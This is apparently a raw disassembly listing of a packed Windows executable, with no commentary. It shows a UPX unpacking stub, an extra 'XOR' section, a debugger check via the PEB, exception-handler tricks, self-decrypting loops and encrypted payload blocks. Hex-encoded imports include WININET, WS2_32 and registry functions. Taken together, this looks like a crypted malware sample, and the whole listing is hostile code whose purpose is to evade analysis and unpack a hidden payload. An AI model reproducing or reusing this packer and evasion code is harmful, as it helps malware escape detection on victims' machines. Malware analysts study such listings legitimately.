dd 0D45830C1h, 8408BE40h, 7DD3E488h, 10B943D2h, 0B801FFEEh
dd 79366110h, 0AD200CF2h, 9F7F070Dh, 0FF215E5h, 700118D8h
dd 0F900F84h, 0F842579h, 4D000F95h, 206FC9Eh, 6C0F847Fh
dd 84AADE0Fh, 0A89A0087h, 93F436Fh, 1F13C88Ch, 50586E69h
dd 0C0A6DB20h, 7250CAh, 39014446h, 3C844FC9h, 123C6B32h
dd 7B027515h, 413C840Dh, 941C0053h, 1CAFFF01h, 0C606EB22h
dd 73255C5Ch, 6370695Ch, 9BFFF975h, 0EC816624h, 0E4FF071Ch
dd 44655300h, 67756265h, 0FA377669h, 67853518h, 6A6441A7h
dd 6F546175h, 0EC99B6E4h, 176E656Bh, 126F4C73h, 0BF6D7075h
dd 61569FDDh, 4165756Ch, 28704F17h, 7324636Fh, 8D48EA58h
dd 76430034h, 65333F61h, 0E33152A3h, 0F86D4C79h, 0F5056D1Bh
dd 545F1165h, 57796172h, 95D52DB5h, 31431735h, 52521A61h
dd 682DBB9Dh, 6854056Fh, 7356140Ch, 0A35B6B75h, 284158DBh
dd 0A578454Fh, 77336D67h, 47356E3Ah, 121EF3F5h, 48F46897h
dd 7F505454h, 5732203Ch, 0FDEF52B5h, 0D4B4F20h, 9F4B010Ah
dd 6ADF6644h, 4C2D02BBh, 3A2D6704h, 18752520h, 0CA587B5Ah
dd 7954282Fh, 0A66D26B5h, 70A3DAB6h, 15836386h, 8EA9EE2Fh
dd 2DC7025Ah, 42C97293h, 9F56B18Bh, 2B004757h, 0A35B47BAh
dd 0E564F6F4h, 42CB73CBh, 6D8D57FBh, 0A9637673h, 0DA6977CBh
dd 0F1538B77h, 175F3203h, 9A69E775h, 7B5E62Eh, 36373803h
dd 0A6BB2774h, 331F3435h, 32033369h, 0D34B75F2h, 13393031h
dd 0C8383F38h, 370D8320h, 20353607h, 34320C83h, 909A3233h
dd 3031C83Ah, 0F93AF378h, 0CC95ACFFh, 4F53BBD9h, 41575446h
dd 4D5C4552h, 62C1F869h, 6F736F7Bh, 5CBF5CD7h, 72727543h
dd 6B61BC22h, 73DC5615h, 75525C0Ah, 85B79F6Eh, 74231716h
dd 6824D26Fh, 0FF532030h, 1B6850A3h, 673BE3F7h, 7264736Eh
dd 1D93706Ah, 652B79B6h, 51530002h, 6612D86h, 6C0E5F06h
dd 5736264Dh, 5F664B68h, 60C14923h, 34421C28h, 68FF5455h
dd 130BC037h, 5E432053h, 0D5762067h, 0FB95B7B3h, 8058763Bh
dd 0C823B532h, 7C65B05Eh, 0FC471A1Bh, 23596E66h, 79931217h
dd 36346B73h, 4200707Eh, 61BF2063h, 0B7B5B623h, 6D1B1358h
dd 0DD975220h, 0B4B63772h, 0E0440300h, 2F660E20h, 0EE7B25B0h
dd 2AAC6D67h, 5B632463h, 22BFDAE4h, 20797469h, 1E6E614Dh
dd 0AC31B81Ah, 74201501h, 2A2AAE89h, 0FD92BBC4h, 0EC01388Ch
dd 65657246h, 0DBF0060Ch, 470DF923h, 6F4D7465h, 978A5F87h
dd 6B4665E2h, 686D614Eh, 74736C01h, 0C01AEF7Bh, 0A956372h
dd 79706F43h, 70A40A19h, 45A1816Fh, 4E326578h, 7C52FFF6h
dd 6C6F6F54h, 32337067h, 70616E53h, 746F6873h, 4DADDD19h
dd 32129C8Ah, 540F7372h, 14AD7305h, 182C358Fh, 80FB05B6h
dd 78654E21h, 41616974h, 215FFD54h, 0F76451Eh, 7469616Bh
dd 53726F46h, 0B6F6BA21h, 4F7B673Ch, 2C766A62h, 0D9B9E144h
dd 8D225AC3h, 3A0B6972h, 0BFBDEC97h, 486573C8h, 0C646E61h
dd 0C25E2447h, 8B6C3BDh, 5A61D26Eh, 0B5CDB3F0h, 0A3449711h
dd 14796456h, 0B6DF75BBh, 2B61984Ch, 6F666E49h, 6509530Fh
dd 37800670h, 9C496218h, 64656B26h, 64D98845h, 6EB328B3h
dd 92E7FB36h, 12E0D0CDh, 6464410Bh, 0F7B30F72h, 4C0B111Dh
dd 61726269h, 0E68AB567h, 4D2B60DAh, 36137C82h, 0D5CB080Bh
dd 0C363CF8Eh, 547B42DAh, 75888169h, 4915DE65h, 0E94D8AD8h
dd 1BDA3478h, 0DD29B36h, 0F239C45Dh, 4F116610h, 78455A62h
dd 0B3612DB6h, 630ADF31h, 9B9E6D13h, 522DC6E0h, 87B591Bh
dd 1766C0E0h, 38657A86h, 0A3604CA7h, 451585B5h, 0D160C3FCh
dd 33759F9Dh, 0A1673A2Bh, 4579654Bh, 0CE40EC3Bh, 0FC18610h
dd 5EC00A51h, 11F65AC2h, 5987309Eh, 21E7426Ch, 841CE010h
dd 0C517B76h, 0BE6E6241h, 0E2B6853h, 310428A5h, 1AC13F86h
dd 3677D985h, 62BB1089h, 440A7DB6h, 720E6112h, 0D61B6669h
dd 0CA79B63Ah, 2B758F67h, 616F6C36h, 6FCE436Fh, 6F112C79h
dd 67702350h, 0E8F5210h, 38F63F90h, 4114B4D0h, 69757163h
dd 74AE7072h, 35494DD8h, 0C3363AA0h, 0DE1359A7h, 0CA7273ECh
dd 18B16D06h, 35B2D1CEh, 150F920Eh, 536B99DAh, 445F1D4Dh
dd 740AC558h, 685F3FB8h, 3627F9F6h, 2CC46DBh, 4F727907h
dd 880110E9h, 9160AD15h, 1CC2D22h, 271DCD34h, 61150E65h
dd 14362CC2h, 0BBB4E70Ah, 4906EE15h, 70737766h, 4166B105h
dd 9C62834Fh, 424F466h, 0DB616C5Ah, 9B558543h, 370E1141h
dd 6705212Ch, 1B866B14h, 6E0306A6h, 74534349h, 8C950E81h
dd 0D471A65h, 0A8EDB2CBh, 273FFA1h, 2C010D02h, 392CB2CBh
dd 0C17346Fh, 0B2CB2CB2h, 10130409h, 4F45AA16h, 455036AAh
dd 0E4FFB60Eh, 59C896B7h, 0E00040D8h, 0B010F00h, 260C0601h
dd 68011CB2h, 2334DC12h, 0C6A32510h, 0B31420Eh, 0B7334A02h
dd 0C079BA4h, 39341E60h, 10B0364Bh, 2D570607h, 6210805Dh
dd 7C64098Ch, 0B0AE3145h, 6A2E1E01h, 0B60D8180h, 269024A6h
dd 7C7B64C4h, 0E0049F90h, 0FBE1642Eh, 0D85BA114h, 272A0737h
dd 48C016h, 81434BE0h, 54C32Fh, 2 dup(0)
db 90h
db 0FFh, 2 dup(0)
align 10h
pusha
mov esi, offset dword_31426000
lea edi, [esi-5000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_31427BD2
; ---------------------------------------------------------------------------
align 8
loc_31427BC8: ; CODE XREF: UPX1:loc_31427BD9�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_31427BCE: ; CODE XREF: UPX1:31427C66�j
; UPX1:31427C7D�j
add ebx, ebx
jnz short loc_31427BD9
loc_31427BD2: ; CODE XREF: UPX1:31427BC0�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427BD9: ; CODE XREF: UPX1:31427BD0�j
jb short loc_31427BC8
mov eax, 1
loc_31427BE0: ; CODE XREF: UPX1:31427BEF�j
; UPX1:31427BFA�j
add ebx, ebx
jnz short loc_31427BEB
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427BEB: ; CODE XREF: UPX1:31427BE2�j
adc eax, eax
add ebx, ebx
jnb short loc_31427BE0
jnz short loc_31427BFC
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31427BE0
loc_31427BFC: ; CODE XREF: UPX1:31427BF1�j
xor ecx, ecx
sub eax, 3
jb short loc_31427C10
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_31427C82
mov ebp, eax
loc_31427C10: ; CODE XREF: UPX1:31427C01�j
add ebx, ebx
jnz short loc_31427C1B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427C1B: ; CODE XREF: UPX1:31427C12�j
adc ecx, ecx
add ebx, ebx
jnz short loc_31427C28
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427C28: ; CODE XREF: UPX1:31427C1F�j
adc ecx, ecx
jnz short loc_31427C4C
inc ecx
loc_31427C2D: ; CODE XREF: UPX1:31427C3C�j
; UPX1:31427C47�j
add ebx, ebx
jnz short loc_31427C38
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427C38: ; CODE XREF: UPX1:31427C2F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_31427C2D
jnz short loc_31427C49
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31427C2D
loc_31427C49: ; CODE XREF: UPX1:31427C3E�j
add ecx, 2
loc_31427C4C: ; CODE XREF: UPX1:31427C2A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_31427C6C
loc_31427C5D: ; CODE XREF: UPX1:31427C64�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_31427C5D
jmp loc_31427BCE
; ---------------------------------------------------------------------------
align 4
loc_31427C6C: ; CODE XREF: UPX1:31427C5B�j
; UPX1:31427C79�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_31427C6C
add edi, ecx
jmp loc_31427BCE
; ---------------------------------------------------------------------------
loc_31427C82: ; CODE XREF: UPX1:31427C0C�j
pop esi
mov edi, esi
mov ecx, 7Eh
loc_31427C8A: ; CODE XREF: UPX1:31427C91�j
; UPX1:31427C96�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_31427C8F: ; CODE XREF: UPX1:31427CB4�j
cmp al, 1
ja short loc_31427C8A
cmp byte ptr [edi], 1
jnz short loc_31427C8A
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_31427C8F
lea edi, [esi+5000h]
loc_31427CBC: ; CODE XREF: UPX1:31427CDE�j
mov eax, [edi]
or eax, eax
jz short loc_31427D07
mov ebx, [edi+4]
lea eax, [eax+esi+7000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+708Ch]
xchg eax, ebp
loc_31427CD9: ; CODE XREF: UPX1:31427CFF�j
mov al, [edi]
inc edi
or al, al
jz short loc_31427CBC
mov ecx, edi
jns short near ptr loc_31427CEA+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_31427CEA: ; CODE XREF: UPX1:31427CE2�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+7090h]
or eax, eax
jz short loc_31427D01
mov [ebx], eax
add ebx, 4
jmp short loc_31427CD9
; ---------------------------------------------------------------------------
loc_31427D01: ; CODE XREF: UPX1:31427CF8�j
call dword ptr [esi+7094h]
loc_31427D07: ; CODE XREF: UPX1:31427CC0�j
popa
jmp loc_31422334
; ---------------------------------------------------------------------------
align 400h
UPX1 ends
; Section 3. (virtual address 00008000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00008000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX2 segment para public 'CODE' use32
assume cs:UPX2
;org 31428000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 3 dup(0)
dd 80C4h, 808Ch, 3 dup(0)
dd 80D1h, 809Ch, 3 dup(0)
dd 80DEh, 80A4h, 3 dup(0)
dd 80E9h, 80ACh, 3 dup(0)
dd 80F4h, 80B4h, 3 dup(0)
dd 8100h, 80BCh, 5 dup(0)
dword_3142808C dd 7C801D77h, 7C80ADA0h, 7C81CDDAh, 0 ; DATA XREF: UPX2:314282EB�r
; XOR:3142A0EB�r
dd 77DD6BF0h, 0
dd 77C371D3h, 0
dd 7E41A8ADh, 0
dd 42C2C8A1h, 0
dd 71AB9639h, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 61720000h
dd 646Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h
dd 6E65704Fh, 41h, 26h dup(0)
; ---------------------------------------------------------------------------
public start
start:
push 0ED01C390h
mov eax, esp
call eax
xchg eax, ebx
pop ebx
call loc_31428269
mov esp, [esp+8]
mov eax, 4EBh ; CODE XREF: UPX2:31428219�j
jmp short near ptr loc_31428214+1
; ---------------------------------------------------------------------------
mov eax, fs:18h
mov eax, [eax+30h]
movzx eax, byte ptr [eax+2]
cmp eax, 0
jnz short locret_31428268
call $+5
pop ebp
sub ebp, 402334h
mov eax, [ebp+40237Bh]
add eax, [ebp+402383h]
mov esi, eax
mov eax, [ebp+40237Fh]
add eax, [ebp+402383h]
push eax
mov edi, esi
xor ecx, ecx
loc_31428257: ; CODE XREF: UPX2:31428266�j
lodsb
xor al, [ebp+40238Bh]
stosb
inc ecx
cmp ecx, [ebp+402387h]
jl short loc_31428257
locret_31428268: ; CODE XREF: UPX2:3142822A�j
retn
; ---------------------------------------------------------------------------
loc_31428269: ; CODE XREF: UPX2:3142820B�p
sub eax, eax
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, 12345678h
xchg eax, [ebx]
add [eax+0], ah
add [eax+7Bh], dh
add [edx+31h], al
add [esi], bl
; ---------------------------------------------------------------------------
dw 0
; ---------------------------------------------------------------------------
js short loc_314282EA
push ebp
mov ebp, esp
call loc_3142829C
call sub_3142834D
jmp loc_314282F1
; ---------------------------------------------------------------------------
loc_3142829C: ; CODE XREF: UPX2:3142828D�p
push dword ptr fs:0
mov fs:0, esp
xor eax, eax
push eax
push eax
push 80000000h
push eax
push 200h
push eax
push 1000h
push 1000h
push eax
call loc_3142A000
xor [ecx], esi
shr byte ptr [eax+0], 0
add [eax+685050h], al
; ---------------------------------------------------------------------------
dd 68800000h, 80000000h, 68505050h, 80000000h, 6850h
db 0, 80h
; ---------------------------------------------------------------------------
loc_314282EA: ; CODE XREF: UPX2:31428288�j
push eax
call ds:dword_3142808C
loc_314282F1: ; CODE XREF: UPX2:31428297�j
sub eax, eax
loc_314282F3: ; CODE XREF: UPX2:314282F9�j
dec al
or al, al
jz short loc_314282FD
jnz short loc_314282F3
jmp short locret_31428364
; ---------------------------------------------------------------------------
loc_314282FD: ; CODE XREF: UPX2:314282F7�j
sub esi, esi
sub ecx, ecx
mov cl, 0CFh
loc_31428303: ; CODE XREF: UPX2:31428305�j
inc esi
dec ecx
jnz short loc_31428303
call sub_31428349
add ecx, 4Eh
sub ebx, ebx
or ebx, 243Ch
push ecx
loc_3142831B: ; CODE XREF: UPX2:3142832D�j
mov al, [ecx]
sub ax, si
xchg al, [ecx]
inc ecx
add si, 0D9h
sub ebx, 1
or ebx, ebx
jnz short loc_3142831B
pop ecx
xchg ebp, fs:0
mov esp, ebp
pop dword ptr fs:0
pop esi
pop ebp
mov [esp+18h], ecx
popa
jmp ecx
; ---------------------------------------------------------------------------
db 2 dup(90h)
; =============== S U B R O U T I N E =======================================
sub_31428349 proc near ; CODE XREF: UPX2:31428307�p
pop ecx
push ecx
retn
sub_31428349 endp
; ---------------------------------------------------------------------------
db 90h
; =============== S U B R O U T I N E =======================================
sub_3142834D proc near ; CODE XREF: UPX2:31428292�p
arg_C = dword ptr 10h
mov ecx, [esp+arg_C]
xor eax, eax
pop dword ptr [ecx+0B8h]
retn
sub_3142834D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dw 905Fh
dd 0C335A81h, 67BBC270h
; ---------------------------------------------------------------------------
locret_31428364: ; CODE XREF: UPX2:314282FB�j
leave
dec ebp
pop ds
aam 0ADh
xchg bl, [edi+38h]
xchg eax, ecx
jnb short near ptr loc_314283C9+1
dec eax
sahf
dec esi
daa
mov esi, ds:6AD88FD6h
adc cl, [eax+51h]
push ecx
sub bh, [esp+ebp+5]
outs dx, dword ptr [si]
inc esp
xchg eax, edx
inc edx
sbb esi, [ebp+eax*4-2Bh]
mov ds:58F23158h, eax
leave
cwde
push es
ja short near ptr loc_314283D2+6
stc
sal byte ptr [esi], cl
fistp word ptr [edi+35h]
inc edx
ror ecx, cl
and eax, 0FE497D0Bh
xlat
scasd
mov esp, 6EA990BDh
xor al, bl
jl short near ptr byte_31428403
sub al, [ebx]
fdiv qword ptr [esi]
jno short near ptr word_3142841A
xor [eax], bl
icebp
dec esp
xchg eax, ecx
and dword ptr [esi+6Fh], 8
loc_314283BC: ; CODE XREF: UPX2:314283DE�j
insb
db 36h
mov bh, 70h
rcl bl, cl
xor eax, [ecx+ebp*8]
adc byte ptr [esp+esi], 0Dh
loc_314283C9: ; CODE XREF: UPX2:3142836D�j
out 0BFh, al ; Interrupt Controller #2, 8259A
mov edx, ds:294A9ECBh
push ss
loc_314283D2: ; CODE XREF: UPX2:31428392�j
lock shr dword ptr [esi-26F889E1h], cl
add edx, [ebx+40h]
db 67h
pop ebx
jmp short loc_314283BC
; ---------------------------------------------------------------------------
dd 711FB2AAh, 547CA2B4h, 43C17B2Dh, 0EF46E2E1h, 0BC74080h
dd 0D70E4AA3h, 0B72430Eh, 0ACD272A2h
db 3 dup(0)
byte_31428403 db 0 ; CODE XREF: UPX2:314283AB�j
dd 5 dup(0)
db 2 dup(0)
word_3142841A dw 0 ; CODE XREF: UPX2:314283B1�j
align 2000h
UPX2 ends
; Section 4. (virtual address 0000A000)
; Virtual size : 00007800 ( 30720.)
; Section size in file : 00007800 ( 30720.)
; Offset to raw data for section: 0000A000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
XOR segment para public 'CODE' use32
assume cs:XOR
;org 3142A000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
loc_3142A000: ; CODE XREF: UPX2:314282C3�p
push 0ED01C390h
mov eax, esp
call eax
xchg eax, ebx
pop ebx
call loc_3142A069
mov esp, [esp+8]
mov eax, 4EBh ; CODE XREF: XOR:3142A019�j
jmp short near ptr loc_3142A014+1
; ---------------------------------------------------------------------------
mov eax, fs:18h
mov eax, [eax+30h]
movzx eax, byte ptr [eax+2]
cmp eax, 0
jnz short locret_3142A068
call $+5
pop ebp
sub ebp, 402334h
mov eax, [ebp+40237Bh]
add eax, [ebp+402383h]
mov esi, eax
mov eax, [ebp+40237Fh]
add eax, [ebp+402383h]
push eax
mov edi, esi
xor ecx, ecx
loc_3142A057: ; CODE XREF: XOR:3142A066�j
lodsb
xor al, [ebp+40238Bh]
stosb
inc ecx
cmp ecx, [ebp+402387h]
jl short loc_3142A057
locret_3142A068: ; CODE XREF: XOR:3142A02A�j
retn
; ---------------------------------------------------------------------------
loc_3142A069: ; CODE XREF: XOR:3142A00B�p
sub eax, eax
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, 12345678h
xchg eax, [ebx]
add [eax+0], ah
add [eax+7Bh], dh
add [edx+31h], al
add [esi], bl
; ---------------------------------------------------------------------------
dw 0
; ---------------------------------------------------------------------------
js short loc_3142A0EA
push ebp
mov ebp, esp
call loc_3142A09C
call sub_3142A14D
jmp loc_3142A0F1
; ---------------------------------------------------------------------------
loc_3142A09C: ; CODE XREF: XOR:3142A08D�p
push dword ptr fs:0
mov fs:0, esp
xor eax, eax
push eax
push eax
push 80000000h
push eax
push 200h
push eax
push 1000h
push 1000h
push eax
call near ptr sub_3142BE00
xor [ecx], esi
shr byte ptr [eax+0], 0
add [eax+685050h], al
; ---------------------------------------------------------------------------
dd 68800000h, 80000000h, 68505050h, 80000000h, 6850h
db 0, 80h
; ---------------------------------------------------------------------------
loc_3142A0EA: ; CODE XREF: XOR:3142A088�j
push eax
call ds:dword_3142808C
loc_3142A0F1: ; CODE XREF: XOR:3142A097�j
sub eax, eax
loc_3142A0F3: ; CODE XREF: XOR:3142A0F9�j
dec al
or al, al
jz short loc_3142A0FD
jnz short loc_3142A0F3
jmp short locret_3142A164
; ---------------------------------------------------------------------------
loc_3142A0FD: ; CODE XREF: XOR:3142A0F7�j
sub esi, esi
sub ecx, ecx
mov cl, 0CFh
loc_3142A103: ; CODE XREF: XOR:3142A105�j
inc esi
dec ecx
jnz short loc_3142A103
call sub_3142A149
add ecx, 4Eh
sub ebx, ebx
or ebx, 243Ch
push ecx
loc_3142A11B: ; CODE XREF: XOR:3142A12D�j
mov al, [ecx]
sub ax, si
xchg al, [ecx]
inc ecx
add si, 0D9h
sub ebx, 1
or ebx, ebx
jnz short loc_3142A11B
pop ecx
xchg ebp, fs:0
mov esp, ebp
pop dword ptr fs:0
pop esi
pop ebp
mov [esp+18h], ecx
popa
jmp ecx
; ---------------------------------------------------------------------------
db 2 dup(90h)
; =============== S U B R O U T I N E =======================================
sub_3142A149 proc near ; CODE XREF: XOR:3142A107�p
pop ecx
push ecx
retn
sub_3142A149 endp
; ---------------------------------------------------------------------------
db 90h
; =============== S U B R O U T I N E =======================================
sub_3142A14D proc near ; CODE XREF: XOR:3142A092�p
arg_C = dword ptr 10h
mov ecx, [esp+arg_C]
xor eax, eax
pop dword ptr [ecx+0B8h]
retn
sub_3142A14D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dw 905Fh
dd 0C335A81h, 67BBC270h
; ---------------------------------------------------------------------------
locret_3142A164: ; CODE XREF: XOR:3142A0FB�j
leave
dec ebp
pop ds
aam 0ADh
xchg bl, [edi+38h]
xchg eax, ecx
jnb short near ptr loc_3142A1C9+1
dec eax
sahf
dec esi
daa
mov esi, ds:6AD88FD6h
adc cl, [eax+51h]
push ecx
sub bh, [esp+ebp+5]
outs dx, dword ptr [si]
inc esp
xchg eax, edx
inc edx
sbb esi, [ebp+eax*4-2Bh]
mov ds:58F23158h, eax
leave
cwde
push es
ja short near ptr loc_3142A1D2+6
stc
sal byte ptr [esi], cl
fistp word ptr [edi+35h]
inc edx
ror ecx, cl
and eax, 0FE497D0Bh
xlat
scasd
mov esp, 6EA990BDh
xor al, bl
jl short loc_3142A203
sub al, [ebx]
fdiv qword ptr [esi]
jno short near ptr loc_3142A215+5
xor [eax], bl
icebp
dec esp
xchg eax, ecx
and dword ptr [esi+6Fh], 8
loc_3142A1BC: ; CODE XREF: XOR:3142A1DE�j
insb
db 36h
mov bh, 70h
rcl bl, cl
xor eax, [ecx+ebp*8]
adc byte ptr [esp+esi], 0Dh
loc_3142A1C9: ; CODE XREF: XOR:3142A16D�j
out 0BFh, al ; Interrupt Controller #2, 8259A
mov edx, ds:294A9ECBh
push ss
loc_3142A1D2: ; CODE XREF: XOR:3142A192�j
lock shr dword ptr [esi-26F889E1h], cl
add edx, [ebx+40h]
db 67h
pop ebx
jmp short loc_3142A1BC
; ---------------------------------------------------------------------------
dd 711FB2AAh, 547CA2B4h, 43C17B2Dh, 0EF46E2E1h, 0BC74080h
dd 0D70E4AA3h, 0B72430Eh, 0ACD272A2h
db 0CCh
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
stosd
loc_3142A203: ; CODE XREF: XOR:3142A1AB�j
test [ebx+eax*2], eax
adc esi, [edi-63h]
cwde
outsb
cmp esp, [esi]
pushf
in al, 0B4h ; Interrupt Controller #2, 8259A
sbb al, 2Fh
sub eax, [ebx+ebp*8]
loc_3142A215: ; CODE XREF: XOR:3142A1B1�j
mov dword ptr ds:0DBF4C155h[eax*4], 0D1671AB4h
xchg edx, [ebp-50h]
; ---------------------------------------------------------------------------
db 8Dh
db 0CCh
db 0Bh, 0C7h, 0B8h
dd 5143B8F8h, 13929DD4h, 3A725C39h, 0AF4675B5h, 7BB25D31h
dd 0EC134649h, 0BFE3E1C5h, 1523679Ch, 7DABCAFBh, 52A21DF1h
dd 1543B3DEh, 515392F9h, 0EBCFF61Dh, 8094BFF3h, 0D50D034Ah
dd 0D43C96B7h, 0C1358500h, 0DCF82A96h, 343675h, 0C9D2B2D9h
dd 3B5062B1h, 9EC5BF15h, 0E3B75074h, 79A41868h, 58BFDB11h
dd 0BCE37A19h, 9407F395h, 19AA221Ah, 0E84F6BA1h, 5CE85A46h
dd 0C1A983B2h, 64C562C9h, 780DAEECh, 58EE2A51h, 75A323B4h
dd 29C2F259h, 86F8AAEh, 0EC93BAE1h, 85843CB9h, 349BB6DEh
dd 9CE36298h, 99AEEF15h, 60C7E787h, 0FDA1C7C4h, 0E5DA76DDh
dd 8CF313BBh, 5A7101C2h, 0BE7B0CC9h, 20DF702Dh, 1C476A92h
dd 80119280h, 6F179CA9h, 9E519581h, 0AC065975h, 0F8009185h
dd 739AC1C3h, 0E9A0BBDAh, 8DB58AF1h, 35C63E66h, 46B87B9h
dd 2BAF7A60h, 2BAC0CCBh, 60577EC7h, 6ABD2219h, 0BAE23F4Fh
dd 7949CB12h, 53359ABFh, 7C8E8210h, 0D8C72D7h, 1439EBCBh
dd 5162C5AFh, 0BF51F6EFh, 9BE3CC0h, 0B2A61513h, 4395BA88h
dd 9BE99779h, 2A2D14A5h, 22663FA2h, 2456AF8h, 0D16BC525h
dd 0B85D75E6h, 5C367754h, 1DF59AF4h, 3C4E61C0h, 0F5064597h
dd 1426F680h, 0E8A77B6Fh, 0AC117995h, 0ACEA69F2h, 0C5E90EE8h
dd 7448C1F7h, 5CC1263Fh, 7219516Eh, 0CC5801A3h, 0A8057ACFh
dd 0E1A153C4h, 46F542E7h, 3E49AEFCh, 1842017Fh, 4121C600h
dd 0D909E997h, 2B2C15FDh, 0F06537ACh, 0B58365Bh, 0D833AE50h
dd 448E8F73h, 3D153AEFh, 0DC6F69C0h, 0C78AA5B7h, 0D4FD41C1h
dd 68DB4E06h, 496AD6CAh, 7883C7DCh, 1FB061D3h, 4053ABh
dd 0B3D58505h, 0E94DB5EFh, 0A446D583h, 4325CAE4h, 0EC0ED69Fh
dd 165BDEC2h, 0DEF4452Eh, 58D6149Fh, 5C41A20Bh, 49AD12CFh
dd 84A6B5E3h, 0A585AA44h, 116D5D7Bh, 62E0C9B1h, 64B17E93h
dd 3A3596FFh, 3809C76Bh, 0F80ECC8Ah, 1579DFEBh, 0B072F1AFh
dd 451F6F0h, 58BE227Dh, 0F9791BEEh, 356DFA9Fh, 0F50166CBh
dd 4730186Bh, 97323EC9h, 0FF3B4405h, 0C7E6AF0h, 7BAE9DE7h
dd 5979A3D2h, 9FF55A7Fh, 0CBB3D5AFh, 68C70AE2h, 28FB9E03h
dd 40593E33h, 8199E3F6h, 0CDF2E207h, 84295D22h, 8DCAF34Eh
dd 5C01333Bh, 0F09C8D88h, 349900A5h, 75ADCF4Eh, 0B71D67Bh
dd 775F452Bh, 0B8C6398Eh, 2FB55AB4h, 41A487BBh, 284D05CCh
dd 8921DB4Ah, 1088CAEFh, 0E4EBD9Ch, 633DE2D6h, 4D666F8h
dd 0B185E1DFh, 2F6A63D6h, 156452F7h, 0F499ABFFh, 0F168232Eh
dd 0E2AE1DFCh, 209DC236h, 937C6341h, 26277FBCh, 3B68466Bh
dd 0C197B2EDh, 0D7B54EBEh, 0BB8D10h, 463C8F5Ah, 25E57CC7h
dd 0C47665E8h, 70D9E39Fh, 10C8A60Bh, 86E20EF4h, 5ACCB59Eh
dd 0ED815FA6h, 8CF156BBh, 3FD21D49h, 48F7D997h, 0B2CCF89Bh
dd 94A170C2h, 0A80DCB11h, 141FA2CAh, 807B0626h, 0EC51B6C3h
dd 297D3C7Fh, 942B7841h, 4575874Ah, 1F39660Bh, 56C592FBh
dd 0EFD93ECCh, 6B4544E3h, 0E6F1C047h, 0A1B1CE7h, 0E271EE39h
dd 0FAF55A98h, 0CB47F72Bh, 0C3AF947h, 2339DEF8h, 4FC88738h
dd 3B26555Fh, 18CA5752h, 2DE90EC3h, 0F055B493h, 1908D12h
dd 0D82DE778h, 0B91EFEA3h, 0A045760Bh, 81F6F6D6h, 781D2A47h
dd 70D6A5E1h, 38B55AB4h, 0BC2186DDh, 53604913h, 0C6C98E78h
dd 2CFEF8C8h, 0A26E5540h, 0BDCAB6A8h, 0B3F90EB4h, 70423274h
dd 0D8FE6F4Bh, 58ED12CCh, 8E396877h, 8C52513Ah, 513156D0h
dd 77AAA927h, 0FA07D865h, 7AC15511h, 6D4978ACh, 3B4DB217h
dd 76565A28h, 0D2F5A9A4h, 483A0404h, 989A816Ch, 0C0F64585h
dd 0FBD5FAD4h, 926B54CFh, 87D8C0A7h, 7406CE78h, 10416D4Fh
dd 585E6DEEh, 625D82FCh, 53C79893h, 10620A94h, 3DC99F6Bh
dd 937872D7h, 0F87D6764h, 0F5089983h, 0EC118387h, 0FD3CB056h
dd 0C469BC2Fh, 8FE0C65Fh, 5C0EF640h, 0BC2D4F37h, 0A258FCFFh
dd 0FFD75C13h, 0E6B9F28Fh, 0B7F31CE7h, 64B696E8h, 0E435D7BFh
dd 9C93967h, 5BCD329Bh, 0C4582F4Ch, 16898758h, 849E769Bh
dd 25CFA3C8h, 58394EB3h, 0A0A6886Fh, 0D194D9BBh, 0C86D9F4Fh
dd 0E8F23EE8h, 843191CAh, 0D8EE5D43h, 60DD0279h, 0D3BCA3BFh
dd 6C42014Eh, 9721C600h, 10C973BFh, 0EBF95EC4h, 0D549575Ah
dd 11FA365Bh, 6540290Eh, 0C010EBCh, 0D9C77A27h, 19DEE64Bh
